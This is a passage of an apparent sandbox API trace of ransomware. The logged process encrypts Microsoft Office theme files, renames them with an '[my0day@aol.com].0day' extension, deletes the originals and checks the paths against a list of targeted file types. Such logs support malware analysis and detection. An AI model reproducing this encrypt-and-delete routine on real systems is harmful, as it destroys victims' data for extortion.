(in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x6818, lpOverlapped=0x0) returned 1 [0272.840] WriteFile (in: hFile=0x378, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x6820, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x6820, lpOverlapped=0x0) returned 1 [0272.841] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.841] WriteFile (in: hFile=0x378, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.841] SetEndOfFile (hFile=0x378) returned 1 [0272.842] CloseHandle (hObject=0x378) returned 1 [0272.842] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.842] SetEndOfFile (hFile=0x354) returned 1 [0272.844] CloseHandle (hObject=0x354) returned 1 [0272.844] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx")) returned 1 [0272.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.845] lstrlenW (lpString=".doc") returned 4 [0272.845] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".docx") returned 5 [0272.845] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.845] lstrlenW (lpString=".pdf") returned 4 [0272.845] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".xls") returned 4 [0272.845] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".xlsx") returned 5 [0272.845] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.845] lstrlenW (lpString=".ppt") returned 4 [0272.845] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.845] lstrlenW (lpString=".zip") returned 4 [0272.845] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".rar") returned 4 [0272.845] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".bz2") returned 4 [0272.845] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.845] lstrlenW (lpString=".7z") returned 3 [0272.845] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".dbf") returned 4 [0272.846] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".1cd") returned 4 [0272.846] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".jpg") returned 4 [0272.846] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".doc") returned 4 [0272.846] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".docx") returned 5 [0272.846] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.846] lstrlenW (lpString=".pdf") returned 4 [0272.846] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".xls") returned 4 [0272.846] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".xlsx") returned 5 [0272.846] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.846] lstrlenW (lpString=".ppt") returned 4 [0272.846] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".zip") returned 4 [0272.846] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".rar") returned 4 [0272.846] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".bz2") returned 4 [0272.846] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString=".7z") returned 3 [0272.846] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".dbf") returned 4 [0272.846] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.846] lstrlenW (lpString=".1cd") returned 4 [0272.846] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx") returned 76 [0272.847] lstrlenW (lpString=".jpg") returned 4 [0272.847] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.847] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.847] lstrlenW (lpString="Grid.eftx") returned 9 [0272.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.849] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=18639) returned 1 [0272.849] CloseHandle (hObject=0x354) returned 1 [0272.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 0x20 [0272.850] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0272.850] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.850] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.850] GetLastError () returned 0x0 [0272.850] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x48cf, lpOverlapped=0x0) returned 1 [0272.965] WriteFile (in: hFile=0x378, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x48d0, lpOverlapped=0x0) returned 1 [0272.966] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.966] WriteFile (in: hFile=0x378, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0272.966] SetEndOfFile (hFile=0x378) returned 1 [0272.966] CloseHandle (hObject=0x378) returned 1 [0272.966] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.966] SetEndOfFile (hFile=0x354) returned 1 [0272.969] CloseHandle (hObject=0x354) returned 1 [0272.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.974] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx")) returned 1 [0273.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.065] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.065] lstrlenW (lpString=".doc") returned 4 [0273.065] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.065] lstrlenW (lpString=".docx") returned 5 [0273.065] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.065] lstrlenW (lpString=".pdf") returned 4 [0273.065] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.065] lstrlenW (lpString=".xls") returned 4 [0273.066] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".xlsx") returned 5 [0273.066] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.066] lstrlenW (lpString=".ppt") returned 4 [0273.066] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString=".zip") returned 4 [0273.066] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".rar") returned 4 [0273.066] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".bz2") returned 4 [0273.066] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".7z") returned 3 [0273.066] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString=".dbf") returned 4 [0273.066] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString=".1cd") returned 4 [0273.066] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString=".jpg") returned 4 [0273.066] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.066] lstrlenW (lpString=".doc") returned 4 [0273.066] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".docx") returned 5 [0273.066] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.066] lstrlenW (lpString=".pdf") returned 4 [0273.066] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".xls") returned 4 [0273.066] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.066] lstrlenW (lpString=".xlsx") returned 5 [0273.066] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.066] lstrlenW (lpString=".ppt") returned 4 [0273.066] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.067] lstrlenW (lpString=".zip") returned 4 [0273.067] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString=".rar") returned 4 [0273.067] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString=".bz2") returned 4 [0273.067] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString=".7z") returned 3 [0273.067] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.067] lstrlenW (lpString=".dbf") returned 4 [0273.067] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.067] lstrlenW (lpString=".1cd") returned 4 [0273.067] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.067] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx") returned 76 [0273.067] lstrlenW (lpString=".jpg") returned 4 [0273.067] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.067] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.067] lstrlenW (lpString="Median.eftx") returned 11 [0273.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0273.688] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=39546) returned 1 [0273.688] CloseHandle (hObject=0x378) returned 1 [0273.688] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 0x20 [0273.702] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0273.723] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.723] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.724] GetLastError () returned 0x0 [0273.724] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x9a7a, lpOverlapped=0x0) returned 1 [0273.727] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x9a80, lpOverlapped=0x0) returned 1 [0273.729] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.729] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0273.729] SetEndOfFile (hFile=0x39c) returned 1 [0273.729] CloseHandle (hObject=0x39c) returned 1 [0273.729] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.729] SetEndOfFile (hFile=0x354) returned 1 [0273.732] CloseHandle (hObject=0x354) returned 1 [0273.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.732] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx")) returned 1 [0273.732] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".doc") returned 4 [0273.733] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".docx") returned 5 [0273.733] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.733] lstrlenW (lpString=".pdf") returned 4 [0273.733] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".xls") returned 4 [0273.733] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".xlsx") returned 5 [0273.733] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.733] lstrlenW (lpString=".ppt") returned 4 [0273.733] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".zip") returned 4 [0273.733] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".rar") returned 4 [0273.733] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".bz2") returned 4 [0273.733] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".7z") returned 3 [0273.733] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".dbf") returned 4 [0273.733] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".1cd") returned 4 [0273.733] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".jpg") returned 4 [0273.733] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.733] lstrlenW (lpString=".doc") returned 4 [0273.733] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.733] lstrlenW (lpString=".docx") returned 5 [0273.734] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.734] lstrlenW (lpString=".pdf") returned 4 [0273.734] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString=".xls") returned 4 [0273.734] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString=".xlsx") returned 5 [0273.734] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.734] lstrlenW (lpString=".ppt") returned 4 [0273.734] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.734] lstrlenW (lpString=".zip") returned 4 [0273.734] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString=".rar") returned 4 [0273.734] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString=".bz2") returned 4 [0273.734] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString=".7z") returned 3 [0273.734] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.734] lstrlenW (lpString=".dbf") returned 4 [0273.734] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.734] lstrlenW (lpString=".1cd") returned 4 [0273.734] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx") returned 78 [0273.734] lstrlenW (lpString=".jpg") returned 4 [0273.734] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.734] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.734] lstrlenW (lpString="Newsprint.eftx") returned 14 [0273.734] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0273.735] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=582401) returned 1 [0273.735] CloseHandle (hObject=0x354) returned 1 [0273.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 0x20 [0273.736] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0273.736] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.736] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.737] GetLastError () returned 0x0 [0273.737] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x8e301, lpOverlapped=0x0) returned 1 [0273.750] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x8e310, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x8e310, lpOverlapped=0x0) returned 1 [0273.762] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.762] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, 